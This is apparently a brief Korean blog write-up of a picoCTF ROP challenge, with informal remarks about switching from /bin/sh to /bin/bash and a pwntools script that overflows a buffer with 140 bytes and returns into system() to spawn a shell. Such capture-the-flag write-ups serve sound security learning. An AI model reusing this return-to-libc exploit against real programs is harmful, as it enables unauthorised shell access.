음... RTL 그럼 마지막 문제는 ROP 겠지?? 제발 64비트 였으면 좋겠다~~~~
/bin/sh 안되서 깜짝 놀랐자너
그래서 고민하다가 /bin/bash 가 생각 났잖어~
여깄네 요놈
익스 ㄱㄱ
아 맞다 시스템
여기씀 익스 긔긔
from pwn import *
p = process("./rop")
payload = "A"*140
payload += p32(0x80483a0)
payload += "A"*4
payload += p32(0x8048610)
p.sendline(payload)
p.interactive()
익스댐
'CTF > Picoctf' 카테고리의 다른 글
picoctf pwnable_NewOverFlow Write up (0) | 2019.10.22 |
---|---|
picoctf pwnable_rop_3 Write up (0) | 2019.10.20 |
picoctf pwnable_rop_1 Write up (0) | 2019.10.20 |